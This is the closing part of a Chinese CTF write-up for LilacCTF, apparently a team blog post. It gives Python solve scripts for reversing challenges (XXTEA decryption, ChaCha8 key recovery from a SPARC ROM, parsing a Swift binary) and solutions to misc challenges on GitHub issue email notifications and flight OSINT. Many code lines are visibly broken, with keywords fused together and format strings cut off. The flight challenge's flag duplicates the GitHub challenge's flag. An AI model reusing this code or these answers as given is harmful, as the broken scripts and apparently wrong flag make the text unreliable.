            v[p] = u32(v[p] - MX(y, z, sum_, k, p, e))
# p = 0
        z = v[n - 1]
        y = v[0]
        v[0] = u32(v[0] - MX(y, z, sum_, k, 0, e))
        sum_ = u32(sum_ - DELTA)
returnTrue
defbtea(v: list, n: int, k) -> bool:
return btea_encrypt(v, n, k)

exp

import struct
DELTA = 0x45555254# 1163219540
defu32(x):return x & 0xFFFFFFFF
defMX(y, z, sum_, k, p, e):
return (((z >> 2) ^ (y << 4)) + ((y >> 5) ^ (z << 3))) ^ (
        (sum_ ^ y) + (k[(p & 3) ^ e] ^ z)
    )
defbtea_decrypt(v, n, k):
# n 为块长度，这里是 4
    q = 6 + 52 // n
    sum_ = u32(q * DELTA)
while sum_ != 0:
        e = (sum_ >> 2) & 3
        y = v[0]
for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = u32(v[p] - MX(y, z, sum_, k, p, e))
            y = v[p]
        z = v[n - 1]
        v[0] = u32(v[0] - MX(y, z, sum_, k, 0, e))
        sum_ = u32(sum_ - DELTA)
if __name__ == "__main__":
    res = [761104570, 1033127419, 3729026053, 795718415]
    key = struct.unpack(", b"1111222233334444")
    v = res[:]  # copy
    btea_decrypt(v, 4, key)
    mid = struct.pack(", *v).decode()
    flag = f"LilacCTF{{{mid}}}"
    print(flag)

JustROM

SPARC Big-endian 32-bit

ROM base：0x10800000 size: 0x10000

RAM base: 0x107F0000 size: 0x14000

ChaCha8 加密，counter=1，nonce=0x41414141/0x42424242/0x43434343。

密文：

"There_is_nothing_you_wanna_get.."

ROM 偏移 0xC000处的 32 字节就是 key：

11 22 33 44 55 66 77 88 99 AA BB CC DD EE FF 00
DE AD BE EF CA FE BA BE 0B AD F0 0D 13 37 13 37

from pathlib import Path
ROM_PATH = "rom.bin"
PLAINTEXT = b"There_is_nothing_you_wanna_get.."
MASK_WORDS = [
0x37329BF6, 0x36A918FC,
0xF2E74973, 0x6149F8D4,  
0x4CF26AC9, 0x3C4C6283,
0x78125C05, 0x5F30959D,
]
MASK_BYTES = b"".join(w.to_bytes(4, "big") for w in MASK_WORDS)  # 32 bytes
COUNTER = 1
NONCE = (0x41414141, 0x42424242, 0x43434343)
SIGMA_OFFSET = 0x4018
KEY_KNOWN_OFFSET = 0xC000
defrotl32(x: int, n: int) -> int:
    x &= 0xFFFFFFFF
return ((x << n) & 0xFFFFFFFF) | (x >> (32 - n))
defquarter_round(a: int, b: int, c: int, d: int):
    a = (a + b) & 0xFFFFFFFF
    d ^= a
    d = rotl32(d, 16)
    c = (c + d) & 0xFFFFFFFF
    b ^= c
    b = rotl32(b, 12)
    a = (a + b) & 0xFFFFFFFF
    d ^= a
    d = rotl32(d, 8)
    c = (c + d) & 0xFFFFFFFF
    b ^= c
    b = rotl32(b, 7)
return a, b, c, d
defchacha_block(state_words, rounds=8):
    x = state_words[:]
    st = state_words[:]
assert rounds % 2 == 0
for _ in range(rounds // 2):
# column rounds
        x[0], x[4], x[8], x[12] = quarter_round(x[0], x[4], x[8], x[12])
        x[1], x[5], x[9], x[13] = quarter_round(x[1], x[5], x[9], x[13])
        x[2], x[6], x[10], x[14] = quarter_round(x[2], x[6], x[10], x[14])
        x[3], x[7], x[11], x[15] = quarter_round(x[3], x[7], x[11], x[15])
# diagonal rounds
        x[0], x[5], x[10], x[15] = quarter_round(x[0], x[5], x[10], x[15])
        x[1], x[6], x[11], x[12] = quarter_round(x[1], x[6], x[11], x[12])
        x[2], x[7], x[8], x[13] = quarter_round(x[2], x[7], x[8], x[13])
        x[3], x[4], x[9], x[14] = quarter_round(x[3], x[4], x[9], x[14])
    out = [(x[i] + st[i]) & 0xFFFFFFFFfor i in range(16)]
return out
defbuild_expected():
return bytes(p ^ m for p, m in zip(PLAINTEXT, MASK_BYTES))
deftry_key(rom: bytes, key_off: int):
    key_bytes = rom[key_off:key_off + 32]
if len(key_bytes) != 32:
returnNone
    key_words = [int.from_bytes(key_bytes[i * 4:(i + 1) * 4], "big") for i in range(8)]
    sigma = [int.from_bytes(rom[SIGMA_OFFSET + i * 4:SIGMA_OFFSET + (i + 1) * 4], "big") for i in range(4)]
    state = sigma + key_words + [COUNTER, NONCE[0], NONCE[1], NONCE[2]]
    out_words = chacha_block(state, rounds=8)
    keystream = b"".join(w.to_bytes(4, "little") for w in out_words)
    expected = build_expected()
    inp = bytes(e ^ k for e, k in zip(expected, keystream[:32]))
if inp.startswith(b"LilacCTF{") and inp.endswith(b"}"):
if all(32 <= b < 127for b in inp):  
try:
return inp.decode("ascii")
except UnicodeDecodeError:
returnNone
returnNone
defmain():
    rom = Path(ROM_PATH).read_bytes()
    s = try_key(rom, KEY_KNOWN_OFFSET)
if s:
        print("[+] Found (known offset):", s)
return
for off in range(0, len(rom) - 32, 4):
        s = try_key(rom, off)
if s:
            print(f"[+] Found (bruteforce key @ 0x{off:X}): {s}")
return
    print("[-] Not found. Check constants / offsets / endian.")
if __name__ == "__main__":
    main()

NineApple

通过查找关键字符串找到程序的主要逻辑

在sub_100006D08()

程序主要逻辑如下

九宫格手势输入→追加点序列 → current_key += digit*weight[idx] → idx++ →点序列转数字串 → map_list 查表得到字符 → 追加到 current_flag同时把 current_key 追加到 key_all→key_all 与 target_all 逐项相等 → 输出 Right! flag is : + current_flag

current_key的实时累加在sub_1000069A4中实现

weight所对应的数据

target_all所对应的数据

map_list所对应的数据（如：L→1478，i→582），数据太多这里就截了前面两个

target_all 存储的是每个字符对应手势的 编码值

map_list 存储的是 数字串 ↔ 字符

由 weight 可计算任意数字串的编码值：enc(dstr) = Σ digit[i]*weight[i]

所以可以：

对 map_list 中每个数字串计算 enc(dstr)
得到 enc(dstr) -> char 的反查表
依次读取 target_all[i]，映射回字符并拼接

exp：

import struct
defread_u64_le(buf, off):
return struct.unpack_from(", buf, off)[0]
defparse_small_string_16(chunk: bytes) -> str:
    last = chunk[-1]
if (last & 0x80) == 0:
raise ValueError("not a Swift small-string (tag bit not set)")
    ln = last & 0x0F
return chunk[:ln].decode("ascii", "ignore")
defmain():
    path = "Nine"
with open(path, "rb") as f:
        data = f.read()
    weights = [read_u64_le(data, 0x10340 + i * 8) for i in range(9)]
    start, end = 0x104E0, 0x109C0
    ss = []
for off in range(start, end, 16):
        ss.append(parse_small_string_16(data[off:off+16]))
    pairs = [(ss[i], ss[i+1]) for i in range(0, len(ss), 2)]
defenc(digitstr: str) -> int:
        ds = [int(c) for c in digitstr]
return sum(ds[i] * weights[i] for i in range(len(ds)))
    rev = {}
for ch, dstr in pairs:
        rev[enc(dstr)] = ch
    targets = [read_u64_le(data, 0x103B0 + i * 8) for i in range(33)]
    flag = "".join(rev[t] for t in targets)
    print(flag)
if __name__ == "__main__":
    main()

Misc

Welcome

丢到 cyberchef 里，点了两次魔法棒就有了

Your GitHub, mine

这个题目是要通过Issue触发的邮件，去给lilacctf-tech发邮件，这个邮件的X-GitHub-Sender必须是tynqf4hn8z-byte

题目同时也能通过tynqf4hn8z-byte去创建一个Issue，那就先发一封试试

先加入Classroom

连接nc创建一个Issue，创建后，发现已经有了个Issue，默认是空白的内容

同时也要去把Watch设置上，能同步收到邮件

提交Issue后，邮箱收到了Issue邮件，X-GitHub-Sender为tynqf4hn8z-byte

虽然lilacctf-tech也是Watching这个项目，但是题目同时说了，通过nc触发的那封不算

Issue也是可以通过mentioned去触发，但是直接进行@lilacctf-tech，没有反应，那尝试添加为项目管理员（或者项目其他角色）后呢？这里试了试管理员

确实能进行@lilacctf-tech

同时发现这里的Issue我也是可以进行编辑，编辑了@lilacctf-tech和我自己，提交后就收到了邮件，同时这个头也是tynqf4hn8z-byte

然后就得到Flag了

Plain Text
LilacCTF{D1sCov3r_Mor3_G17hU8_f347ur32}

Sky Is Ours

感觉和这个飞机好像，青岛航空。

青岛航空有 A320 ,A320 neo ,A321。

下面是题目：

没认出来这是哪里

下面是大连，应该是经过，向南飞的航班，然后去flightradar24查看青岛航空从东北出发的航线

排查哈尔滨的航线时，有时间比较接近的，看看YNT和WEH方向的，基本二选一了

还是QW6097经过DLC时比较近

LilacCTF{D1sCov3r_Mor3_G17hU8_f347ur32}

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

阅读原文

跳转微信打开